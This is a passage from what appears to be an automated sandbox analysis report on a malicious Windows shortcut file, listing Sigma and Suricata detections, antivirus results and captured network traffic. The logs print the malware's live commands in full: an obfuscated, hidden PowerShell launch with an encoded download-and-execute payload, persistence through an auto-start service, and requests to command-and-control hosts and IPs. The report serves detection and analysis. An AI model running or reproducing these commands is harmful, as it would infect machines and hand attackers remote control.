ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 7256, ProcessName: net.exe
      Sigma detected: New Service Creation Using Sc.EXE
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6160, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 7188, ProcessName: sc.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , CommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , CommandLine|base64offset|contains: >E(D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1868, ParentProcessName: cmd.exe, ProcessCommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , ProcessId: 3340, ProcessName: powershell.exe
      Sigma detected: SC.EXE Query Execution
      Source: Process startedAuthor: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8608, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 8508, ProcessName: sc.exe
      Sigma detected: Start Windows Service Via Net.EXE
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6160, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 7256, ProcessName: net.exe

      Data Obfuscation

      barindex
      Sigma detected: Dot net compiler compiles file from suspicious location
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3340, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline", ProcessId: 8228, ProcessName: csc.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T10:46:28.471271+010020283713Unknown Traffic192.168.11.304977423.222.16.17443TCP
      2024-11-08T10:47:31.939690+010020283713Unknown Traffic192.168.11.304977823.209.72.21443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T10:47:19.855477+010028033053Unknown Traffic192.168.11.3049777172.67.137.62443TCP
      2024-11-08T10:48:02.856786+010028033053Unknown Traffic192.168.11.3049783172.67.137.62443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T10:45:47.049876+010028032742Potentially Bad Traffic192.168.11.3049752172.67.137.62443TCP
      2024-11-08T10:45:49.235198+010028032742Potentially Bad Traffic192.168.11.3049754172.67.137.62443TCP
      2024-11-08T10:45:51.366013+010028032742Potentially Bad Traffic192.168.11.3049756172.67.137.62443TCP
      2024-11-08T10:46:15.438746+010028032742Potentially Bad Traffic192.168.11.3049770172.67.137.62443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://vnc.chatelement.online:80/client/wsAvira URL Cloud: Label: malware
      Multi AV Scanner detection for dropped file
      Source: C:\Windows\Temp\svczHost.exeReversingLabs: Detection: 15%
      Multi AV Scanner detection for submitted file
      Source: gW6FHWNFzR.lnkReversingLabs: Detection: 15%
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49760 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49777 version: TLS 1.2
      Source: Binary string: em.pdbAoAIAAgACAAIAAgAC source: powershell.exe, 0000000B.00000002.3876568092.000001F1DC88F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ib.pdbC source: powershell.exe, 00000007.00000002.3050489833.0000014074F4A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: bb.pdb source: powershell.exe, 00000007.00000002.3050489833.0000014074F4A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Management.Automation.pdbPro source: powershell.exe, 00000007.00000002.3050489833.0000014074F4A000.00000004.00000020.00020000.00000000.sdmp

      Networking

      barindex
      Potential dropper URLs found in powershell memory
      Source: powershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpString found in memory: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
      Source: powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmpString found in memory: <&nbsp;&nbsp;&nbsp;"><a href="http://style="float:left;concerned with the=http%3A%2F%2Fwww.in popular culturetype="text/css" />it is possible to Harvard Universitytylesheet" href="/the main characterOxford University name="keywords" cstyle="text-align:the United Kingdomfederal government<div style="margin depending on the description of the<div class="header.min.js"></script>destruction of theslightly differentin accordance withtelecommunicationsindicates that theshortly thereafterespecially in the European countriesHowever, there aresrc="http://staticsuggested that the" src="http://www.a large number of Telecommunications" rel="nofollow" tHoly Roman Emperoralmost exclusively" border="0" alt="Secretary of Stateculminating in theCIA World Factbookthe most importantanniversary of thestyle="background-<li><em><a href="/the Atlantic Oceanstrictly speaking,shortly before thedifferent types ofthe Ottoman Empire><img src="http://An Introduction toconsequence of thedeparture from theConfederate Statesindigenous peoplesProceedings of theinformation on thetheories have beeninvolvement in thedivided into threeadjacent countriesis responsible fordissolution of thecollaboration withwidely regarded ashis contemporariesfounding member ofDominican Republicgenerally acceptedthe possibility ofare also availableunder constructionrestoration of thethe general publicis almost entirelypasses through thehas been suggestedcomputer and videoGermanic languages according to the different from theshortly afterwardshref="https://www.recent developmentBoard of Directors<div class="search| <a href="http://In particular, theMultiple footnotesor other substancethousands of yearstranslation of the</div>
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 8008
      Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49782
      Source: global trafficTCP traffic: 192.168.11.30:49780 -> 23.88.71.29:8000
      Source: global trafficTCP traffic: 192.168.11.30:49781 -> 206.206.126.252:8008
      Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/12 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/79 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: QUkX8Z3rVUCD9OdfWRXOBA==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: QGsziKO/v0aFlgtYcf6gBQ==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: HaVAK3cyCkmYclqhWevY7A==Sec-WebSocket-Version: 13
      Source: Joe Sandbox ViewIP Address: 172.67.137.62 172.67.137.62
      Source: Joe Sandbox ViewIP Address: 206.206.126.252 206.206.126.252
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49774 -> 23.222.16.17:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49778 -> 23.209.72.21:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49756 -> 172.67.137.62:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49752 -> 172.67.137.62:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49754 -> 172.67.137.62:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49770 -> 172.67.137.62:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49777 -> 172.67.137.62:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49783 -> 172.67.137.62:443
      Source: global trafficHTTP traffic detected: GET /ij HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file3/118b0ccf6258fcd855ea3e43f821c430215052fb3eb9eca5064994f5c1e35529838d37eb8bbc4caaba3d8623e21fcd8b056582e85c96b976f81a6cd8cefe5b84009c23e8fce5f3fc908c3b0c8f1f8b1f651fed32fb24db08cc428e6823d1046e/Windows%20Defender/16/16/user/208 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118007bceee7073cc21d5383251ad61bfc7 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
      Source: global trafficHTTP traffic detected: GET /file2/941a75b2b8dd4d62918624c57bd478b5a12d02b9af905ac945932cb2af1ccd03230d09759e21f3f8c4f49ade0935501a87d56385542996b4033bd8dadba534c6f30c87289a81bd30a4920f8febc5256072687f5c2fc34696a5712231bbacfbf218a5274b2e64710df2467bce4536ee56 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ce0b51c3dbc308f4e5560609b6f4a95e HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
      Source: global trafficHTTP traffic detected: GET /file2/f3fcab55ab8559517835b15ceb841a5e426396ae9229b9cd92da986e6e90c4bf860a154c8fa1f9c630725c0c313abc5815d1ee096544b1025a795eed13698b4d400337bba182b28ee7aebea1ac37b2ac3671d41f9f3f21825175eec527034e65d3408693d15960269d4f4ad353c7ea53 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327eefbc1ebec8d032550acafd784 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 85
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327eefbc1ebec8d032550acafd784 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 86
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327eefbc1ebec8d032550acafd784 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 62
      Source: global trafficHTTP traffic detected: GET /file2/703e90d03436817ef0c550cdab0733b4e7b1e8dce7d6d7e6af8c26ad2c61f0372b215c6f1df310b2f1c2891118dcdea15d56ca524f9e1697046cd75246b4885b7b701d1f128fa7947395230ce4dece18bbf7de42dab4380176a133a711ef9bd142ddf032fed528aee1e6eb8604c5d196 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file2/a931528c26e1c78e87bafbbfbe7cd3d2eb625e6900c36f7e4b647edf6907702d6ae2fd22a4c9df957a8baa93a3c2a28c32ca33006baf539531f41da4e7fb4444fad35468db56a2b85e5680303c8dab5f8b4923406be2a3216aa7480a3d270cd89a984610d77ede5fd7c761f22cd178c7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 140
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 69
      Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec469ac5d7939c1a666e89b2957d1443edc11d1052886fe1517bdaf10c9278dc72d04afcd88afb6e1e8bfd78687aff3d34d26ad6eb1ddfeabc5826fb14cc32d25c72b9583791a899f256f8566bc1538ad7c1f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 200
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 97
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 64
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ij HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file3/118b0ccf6258fcd855ea3e43f821c430215052fb3eb9eca5064994f5c1e35529838d37eb8bbc4caaba3d8623e21fcd8b056582e85c96b976f81a6cd8cefe5b84009c23e8fce5f3fc908c3b0c8f1f8b1f651fed32fb24db08cc428e6823d1046e/Windows%20Defender/16/16/user/208 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /file2/941a75b2b8dd4d62918624c57bd478b5a12d02b9af905ac945932cb2af1ccd03230d09759e21f3f8c4f49ade0935501a87d56385542996b4033bd8dadba534c6f30c87289a81bd30a4920f8febc5256072687f5c2fc34696a5712231bbacfbf218a5274b2e64710df2467bce4536ee56 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /file2/f3fcab55ab8559517835b15ceb841a5e426396ae9229b9cd92da986e6e90c4bf860a154c8fa1f9c630725c0c313abc5815d1ee096544b1025a795eed13698b4d400337bba182b28ee7aebea1ac37b2ac3671d41f9f3f21825175eec527034e65d3408693d15960269d4f4ad353c7ea53 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /file2/703e90d03436817ef0c550cdab0733b4e7b1e8dce7d6d7e6af8c26ad2c61f0372b215c6f1df310b2f1c2891118dcdea15d56ca524f9e1697046cd75246b4885b7b701d1f128fa7947395230ce4dece18bbf7de42dab4380176a133a711ef9bd142ddf032fed528aee1e6eb8604c5d196 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file2/a931528c26e1c78e87bafbbfbe7cd3d2eb625e6900c36f7e4b647edf6907702d6ae2fd22a4c9df957a8baa93a3c2a28c32ca33006baf539531f41da4e7fb4444fad35468db56a2b85e5680303c8dab5f8b4923406be2a3216aa7480a3d270cd89a984610d77ede5fd7c761f22cd178c7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec469ac5d7939c1a666e89b2957d1443edc11d1052886fe1517bdaf10c9278dc72d04afcd88afb6e1e8bfd78687aff3d34d26ad6eb1ddfeabc5826fb14cc32d25c72b9583791a899f256f8566bc1538ad7c1f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/12 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/79 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: QUkX8Z3rVUCD9OdfWRXOBA==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: QGsziKO/v0aFlgtYcf6gBQ==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: HaVAK3cyCkmYclqhWevY7A==Sec-WebSocket-Version: 13
      Source: global trafficDNS traffic detected: DNS query: uyt1n8ded9fb380.com
      Source: unknownHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118007bceee7073cc21d5383251ad61bfc7 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
